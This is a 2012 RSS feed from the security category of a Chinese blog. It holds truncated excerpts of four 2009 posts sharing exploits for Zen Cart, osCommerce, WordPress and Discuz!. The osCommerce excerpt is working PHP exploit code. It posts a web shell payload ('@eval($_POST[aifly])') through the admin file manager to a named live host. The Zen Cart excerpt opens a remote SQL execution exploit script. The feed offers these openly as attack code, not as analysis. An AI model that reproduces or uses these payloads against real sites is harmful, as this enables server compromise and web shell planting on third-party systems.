<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SIDE-ALICE &#187; 信息安全Security</title>
	<atom:link href="http://sidealice.com/category/%e6%8a%80%e6%9c%aftechnology/%e4%bf%a1%e6%81%af%e5%ae%89%e5%85%a8security/feed/" rel="self" type="application/rss+xml" />
	<link>http://sidealice.com</link>
	<description>..::欢迎来到SIDE-ALICE::..	[ACG+Tech+Orz]</description>
	<lastBuildDate>Tue, 03 Apr 2012 17:17:59 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Zen Cart admin/sqlpatch.php模块SQL注入漏洞</title>
		<link>http://sidealice.com/2009/09/zen-cart-adminsqlpatch-php%e6%a8%a1%e5%9d%97sql%e6%b3%a8%e5%85%a5%e6%bc%8f%e6%b4%9e/</link>
		<comments>http://sidealice.com/2009/09/zen-cart-adminsqlpatch-php%e6%a8%a1%e5%9d%97sql%e6%b3%a8%e5%85%a5%e6%bc%8f%e6%b4%9e/#comments</comments>
		<pubDate>Fri, 11 Sep 2009 05:47:46 +0000</pubDate>
		<dc:creator>AirForce</dc:creator>
				<category><![CDATA[信息安全Security]]></category>
		<category><![CDATA[zencart]]></category>

		<guid isPermaLink="false">http://sidealice.com/?p=1488</guid>
		<description><![CDATA[#!/usr/bin/python # # ------- Zen Cart 1.3.8 Remote SQL Execution # http://www.zen-cart.com/ # Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! # A new version (1.3.8a) is avaible on http://www.zen-cart.com/ # # BlackH # # # Notes: must have admin/sqlpatch.php enabled # # clean the database : # DELETE [...]]]></description>
		<wfw:commentRss>http://sidealice.com/2009/09/zen-cart-adminsqlpatch-php%e6%a8%a1%e5%9d%97sql%e6%b3%a8%e5%85%a5%e6%bc%8f%e6%b4%9e/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>osCommerce Online Merchant 2.2 RC2a RCE Exploit 攻击代码(by Flyh4t)</title>
		<link>http://sidealice.com/2009/09/oscommerce-online-merchant-2-2-rc2a-rce-exploit-%e6%94%bb%e5%87%bb%e4%bb%a3%e7%a0%81by-flyh4t/</link>
		<comments>http://sidealice.com/2009/09/oscommerce-online-merchant-2-2-rc2a-rce-exploit-%e6%94%bb%e5%87%bb%e4%bb%a3%e7%a0%81by-flyh4t/#comments</comments>
		<pubDate>Fri, 11 Sep 2009 05:44:25 +0000</pubDate>
		<dc:creator>AirForce</dc:creator>
				<category><![CDATA[信息安全Security]]></category>
		<category><![CDATA[oscommerce2.2rc2a]]></category>

		<guid isPermaLink="false">http://sidealice.com/?p=1485</guid>
		<description><![CDATA[&#60;?php print_r(' +---------------------------------------------------------------------------+ osCommerce Online Merchant 2.2 RC2a RCE Exploit by Flyh4t mail: phpsec@hotmail.com team: http://www.wolvez.org dork: Powered by osCommerce Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST Thx to exploits of blackh +---------------------------------------------------------------------------+ '); $host ='democn.51osc.com'; $path = '/'; $admin_path = 'admin/'; $shellcode = "filename=fly.php&#38;file_contents=test&#60;?php%20@eval(\$_POST[aifly]);?&#62;"; $message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n"; $message.="Accept: image/gif, image/x-xbitmap, [...]]]></description>
		<wfw:commentRss>http://sidealice.com/2009/09/oscommerce-online-merchant-2-2-rc2a-rce-exploit-%e6%94%bb%e5%87%bb%e4%bb%a3%e7%a0%81by-flyh4t/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 2.8 All Version Xss 0DAY</title>
		<link>http://sidealice.com/2009/08/wordpress-2-8-all-version-xss-0day/</link>
		<comments>http://sidealice.com/2009/08/wordpress-2-8-all-version-xss-0day/#comments</comments>
		<pubDate>Sun, 30 Aug 2009 01:14:01 +0000</pubDate>
		<dc:creator>AirForce</dc:creator>
				<category><![CDATA[信息安全Security]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://sidealice.com/?p=1370</guid>
		<description><![CDATA[From：vul.kr It had been published that wordpress 2.8 All version are suffering from Xss,attackers can use this to do fishing,they make a wordpress login page as it is your own.If you don’t take care,your password will be sent to the attacker’s website.With your password,they can edit pages and upload webshell.It is harmful. How is the [...]]]></description>
		<wfw:commentRss>http://sidealice.com/2009/08/wordpress-2-8-all-version-xss-0day/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Discuz 攻击/BUGs  by 8ovul.com</title>
		<link>http://sidealice.com/2009/08/discuz-%e6%94%bb%e5%87%bbbugs-by-8ovul-com/</link>
		<comments>http://sidealice.com/2009/08/discuz-%e6%94%bb%e5%87%bbbugs-by-8ovul-com/#comments</comments>
		<pubDate>Sat, 29 Aug 2009 11:49:22 +0000</pubDate>
		<dc:creator>AirForce</dc:creator>
				<category><![CDATA[信息安全Security]]></category>
		<category><![CDATA[discuz]]></category>

		<guid isPermaLink="false">http://sidealice.com/?p=1335</guid>
		<description><![CDATA[Some Of Discuz! Bugs[www.80vul.com] “Crossday Discuz! Board 论坛系统（简称 Discuz! 论坛，中国国家版权局著作权登记号 2006SR11895）是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。作为商业软件产品， Discuz! 在代码质量，运行效率，负载能力，安全等级，功能可操控性和权限严密性等方面都在广大用户中有良好的口碑。凭借 Discuz! 开发组长期积累的丰富的 web 开发及数据库经验，和强于创新，追求完美的设计理念，使得 Discuz! 在很短时间内以其鲜明的个性特色从国内外同类产品中脱颖而出。经过了效率最优化和负载能力最佳化设计的 Discuz! ，已获得业内越来越多专家和权威企业的认可。”以上是官方自己的介绍。 # Title Description PoC/Exploit Fix 18 Discuz! admin\styles.inc.php get-webshell bug 由于Discuz!的admin\styles.inc.php里preg_match正则判断$newcvar变量操作不够严谨，导致执行代码漏洞. SODB-2009-02.txt NO 17 Discuz!&#60;5.50 $onlineipmatches 未初始化漏洞 由于Discuz!&#60;5.50的common.inc.php使用preg_match()的变量$onlineipmatches 未初始化漏洞,导致可以容易构造$onlineip SODB-2009-01.txt yes 16 Discuz! 1_modcp_editpost.tpl.php xss bug 由于Discuz!的1_modcp_editpost.tpl.php里$orig['message']未过滤,导致一个xss漏洞. SODB-2008-16.txt NO 15 [...]]]></description>
		<wfw:commentRss>http://sidealice.com/2009/08/discuz-%e6%94%bb%e5%87%bbbugs-by-8ovul-com/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

